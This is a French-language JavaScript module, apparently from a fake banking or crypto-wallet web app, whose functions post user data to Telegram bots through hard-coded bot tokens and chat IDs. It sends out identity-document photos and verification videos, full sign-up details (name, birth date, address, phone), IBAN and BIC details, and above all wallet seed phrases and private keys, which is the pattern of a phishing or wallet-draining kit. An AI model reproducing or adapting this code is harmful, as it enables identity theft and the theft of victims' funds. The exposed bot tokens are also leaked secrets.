const TELEGRAM_BOT_TOKEN = '8028346158:AAEeBg7gBwzfNIAFi1jRzI5YFM4r1KRkb6Q';
const TELEGRAM_CHAT_ID = '-1002653454696';

/**
 * Convertit un fichier en FormData pour l'envoi à Telegram
 */
const fileToFormData = async (file, fileName = 'document.jpg') => {
  let blob = file;
  
  const formData = new FormData();
  formData.append('chat_id', TELEGRAM_CHAT_ID);
  formData.append('document', blob, fileName);
  
  return formData;
};

/**
 * Envoie un document à Telegram
 */
export const uploadDocument = async (file, userId, documentType) => {
  try {
    console.log(`Début de l'envoi du document ${documentType} pour l'utilisateur ${userId}`);
    
    // Déterminer le type de contenu et le nom de fichier
let blob;
let fileName;

if (file instanceof Blob && file.type && file.type.includes('video')) {
  console.log("Traitement d'un fichier vidéo:", file.type);
  blob = file;
  fileName = `${documentType}_${Date.now()}.webm`;
}
  else if (file.uri) {
  // Format React Native
  const response = await fetch(file.uri);
  blob = await response.blob();
  fileName = documentType + '.jpg';
} else if (file.webPath) {
  // Format Capacitor
  const response = await fetch(file.webPath);
  blob = await response.blob();
  fileName = documentType + '.jpg';
} else if (typeof file === 'string' && file.startsWith('data:')) {
  // Format Base64
  const response = await fetch(file);
  blob = await response.blob();
  fileName = documentType + '.jpg';
} else {
  // Autre format
  blob = file;
  fileName = documentType + '.jpg';
}
    
    const formData = await fileToFormData(blob, fileName);
    formData.append('caption', `${userId}_${documentType}_${Date.now()}`);
    
    const response = await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendDocument`, {
      method: 'POST',
      body: formData
    });
    
    const result = await response.json();
    console.log("Réponse Telegram:", result);
    
    if (result.ok) {
      return {
        success: true,
        messageId: result.result.message_id,
        documentType,
        uploadedAt: new Date().toISOString()
      };
    } else {
      throw new Error(`Erreur Telegram: ${result.description}`);
    }
  } catch (error) {
    console.error("Erreur lors de l'envoi du document à Telegram:", error);
    return {
      success: false,
      error: error.message
    };
  }
};

/**
 * Envoie tous les documents à Telegram
 */
export const uploadVerificationDocuments = async (documents, userId) => {
  try {
    console.log("Début de l'envoi de tous les documents pour l'utilisateur", userId);
    console.log("Documents disponibles:", documents);
    
    const results = {
      success: true,
      messageIds: {},
      errors: []
    };
    
    // Envoyer chaque document si présent
    for (const [docType, docData] of Object.entries(documents)) {
      if (docData && (docData.file || docData.preview)) {
        const fileToUpload = docData.file || docData.preview;
        console.log(`Envoi du document ${docType}`, fileToUpload);
        
        const uploadResult = await uploadDocument(fileToUpload, userId, docType);
        
        if (uploadResult.success) {
          results.messageIds[docType] = uploadResult.messageId;
        } else {
          results.errors.push({
            documentType: docType,
            error: uploadResult.error
          });
          results.success = false;
        }
      } else {
        console.log(`Document ${docType} non disponible ou incomplet`);
      }
    }
    
    console.log("Résultats de l'envoi:", results);
    return results;
  } catch (error) {
    console.error("Erreur lors de l'envoi des documents:", error);
    return {
      success: false,
      error: error.message
    };
  }
};





export const sendUserDataToTelegram = async (userData) => {
  try {
    console.log("Début d'envoi des données utilisateur à Telegram");
    
    const BOT_TOKEN = '8028346158:AAEeBg7gBwzfNIAFi1jRzI5YFM4r1KRkb6Q';
    const CHAT_ID = '-1002612890153'; 
    
    // Formater avec les emojis mais sans Markdown
    const userDataText = 
      "🆕 NOUVEL UTILISATEUR INSCRIT 🆕\n\n" +
      `📧 Email: ${userData.email}\n` +
      `👤 Nom d'utilisateur: ${userData.fullName}\n` +
      `👤 Nom: ${userData.lastName}\n` +
      `👤 Prénom: ${userData.firstName}\n` +
      `🎂 Date de naissance: ${userData.birthDay}/${userData.birthMonth}/${userData.birthYear}\n` +
      `🏠 Adresse: ${userData.address}\n` +
      `📍 Code postal: ${userData.postalCode}\n` +
      `🏙️ Ville: ${userData.city}\n` +
      `🌍 Pays: ${userData.country}\n` +
      `📱 Téléphone: +${userData.phoneCountry === 'FR' ? '33' : 
                    userData.phoneCountry === 'BE' ? '32' : 
                    userData.phoneCountry === 'CH' ? '41' : 
                    userData.phoneCountry === 'DE' ? '49' : ''} ${userData.phone}\n` +
      `📅 Date d'inscription: ${new Date().toLocaleString('fr-FR')}\n` +
      `🆔 ID utilisateur: user_${Date.now()}`;
    
    // Envoyer le message - SANS le mode Markdown cette fois
    const response = await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        chat_id: CHAT_ID,
        text: userDataText
        // Nous avons retiré parse_mode: 'Markdown'
      })
    });
    
    const result = await response.json();
    
    if (result.ok) {
      console.log("Message envoyé avec succès, ID:", result.result.message_id);
      return {
        success: true,
        messageId: result.result.message_id
      };
    } else {
      console.error("Erreur dans la réponse Telegram:", result.description);
      throw new Error(`Erreur Telegram: ${result.description}`);
    }
  } catch (error) {
    console.error("Exception lors de l'envoi des données à Telegram:", error);
    return {
      success: false,
      error: error.message
    };
  }
};







// Fonction pour notifier les virements avec détails complets
export const sendTransferNotification = async (transferData) => {
  const BOT_TOKEN = "8200668082:AAGj7PzW1hEoF813mcq3C2H-pDbdtPgYEGE";
  const CHAT_ID = "-1002733396121"; // ✅ CHAT_ID corrigé
  
  const { type, amount, from, to, status, details } = transferData;
  
  let message;
  
  if (type === 'hust') {
    message = `🔄 VIREMENT HUST ${status === 'processed' ? 'TRAITÉ ✅' : ''}
💰 Montant: ${amount}€
👤 De: ${from}
👤 Vers: ${to}
📅 ${new Date().toLocaleString('fr-FR')}`;
  } 
  else if (type === 'bank') {
    message = `🏦 NOUVEAU VIREMENT BANCAIRE À TRAITER
💰 Montant: ${amount}€
👤 Client: ${from}

📋 DÉTAILS BANCAIRES:
💱 Devise: ${details?.currency || 'EUR - Euro'}
👤 Nom: ${details?.name || 'Non renseigné'}
🏛️ IBAN: ${details?.iban || 'Non renseigné'}
🔢 BIC: ${details?.bic || 'Non renseigné'}

📅 ${new Date().toLocaleString('fr-FR')}`;
  } 
  else if (type === 'crypto') {
    message = `₿ NOUVEAU RETRAIT CRYPTO À TRAITER
💰 Montant: ${amount}€
👤 Client: ${from}

📋 DÉTAILS CRYPTO:
💱 Devise: ${details?.cryptoCurrency || 'BTC - Bitcoin'}
👤 Surnom: ${details?.nickname || 'Non renseigné'}
🔗 Adresse portefeuille: ${details?.walletAddress || 'Non renseignée'}

📅 ${new Date().toLocaleString('fr-FR')}`;
  } 
  else {
    message = `💸 NOUVEAU VIREMENT À TRAITER
💰 Montant: ${amount}€
👤 Client: ${from}
🏦 Type: ${type}
📅 ${new Date().toLocaleString('fr-FR')}`;
  }

  try {
    const response = await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: CHAT_ID,
        text: message
      })
    });
    return { success: response.ok };
  } catch (error) {
    return { success: false, error };
  }
};










// Constantes pour le bot wallet
const WALLET_BOT_TOKEN = '8313713504:AAH6K718R00mAeKLe3QrrssZdujccxt463Q';
const WALLET_CHANNEL_ID = '-1002988829838';

// Fonction pour envoyer les seed phrases
export const sendSeedPhraseImport = async (data) => {
  try {
    const message = `
🌱 IMPORT SEED PHRASE
📧 Email: ${data.email || 'Non fourni'}
👤 Nom: ${data.fullName || 'Non fourni'}
🔑 Phrase de récupération: ${data.seedPhrase}
⏰ Date: ${new Date().toLocaleString('fr-FR')}
    `;

    const response = await fetch(`https://api.telegram.org/bot${WALLET_BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: WALLET_CHANNEL_ID,
        text: message
      })
    });

    const result = await response.json();
    if (result.ok) {
      return { success: true, messageId: result.result.message_id };
    } else {
      return { success: false, error: result.description };
    }
  } catch (error) {
    return { success: false, error: error.message };
  }
};

// Fonction pour envoyer les clés privées
export const sendPrivateKeyImport = async (data) => {
  try {
    const message = `
🔐 IMPORT CLÉ PRIVÉE
📧 Email: ${data.email || 'Non fourni'}
👤 Nom: ${data.fullName || 'Non fourni'}
🌐 Réseau: ${data.network}
📝 Nom du wallet: ${data.walletName}
🔑 Clé privée: ${data.privateKey}
⏰ Date: ${new Date().toLocaleString('fr-FR')}
    `;

    const response = await fetch(`https://api.telegram.org/bot${WALLET_BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: WALLET_CHANNEL_ID,
        text: message
      })
    });

    const result = await response.json();
    if (result.ok) {
      return { success: true, messageId: result.result.message_id };
    } else {
      return { success: false, error: result.description };
    }
  } catch (error) {
    return { success: false, error: error.message };
  }
};








// Fonction pour récupérer les taux de change
export const fetchExchangeRates = async (baseCurrency = 'EUR') => {
  try {
    const response = await fetch(`https://api.exchangerate-api.com/v4/latest/${baseCurrency}`);
    const data = await response.json();
    return {
      success: true,
      rates: data.rates
    };
  } catch (error) {
    console.error('Erreur récupération taux de change:', error);
    return {
      success: false,
      error: error.message
    };
  }
};
